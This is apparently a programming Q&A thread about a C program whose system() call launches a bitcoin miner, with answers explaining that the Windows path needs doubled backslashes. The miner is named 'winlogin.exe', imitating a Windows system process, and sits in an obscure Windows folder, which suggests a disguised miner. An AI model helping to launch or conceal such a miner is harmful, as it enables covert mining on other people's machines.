i'm trying to run a bitcoin miner trough a system command. Here is the code

#include <windows.h>
int main()
{
system("C:\Windows\AppPatch\Custom\Personal\winlogin.exe -o http://example.pool.com:80 -u user -p password");
}

But the prompt windows apper for a millisecond and close instantly. Any suggest? thanks.

link|improve this question
What's the result when you run this command in a terminal? – ciphor Jan 21 at 15:25
feedback

closed as too localized by Kev Jan 22 at 16:21

This question is unlikely to ever help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. See the FAQ for guidance on how to improve it.

1 Answer

You need to have double \ for paths

system("C:\\Windows\\AppPatch\\Custom\\Personal\\winlogin.exe -o http://example.pool.com:80 -u user -p password");

or single '/'

link|improve this answer
I hate windows backslash. Again. Thanks :) – user1143336 Jan 21 at 15:26
Or you could use the other slash '/' – Loki Astari Jan 21 at 18:15
feedback

Not the answer you're looking for? Browse other questions tagged or ask your own question.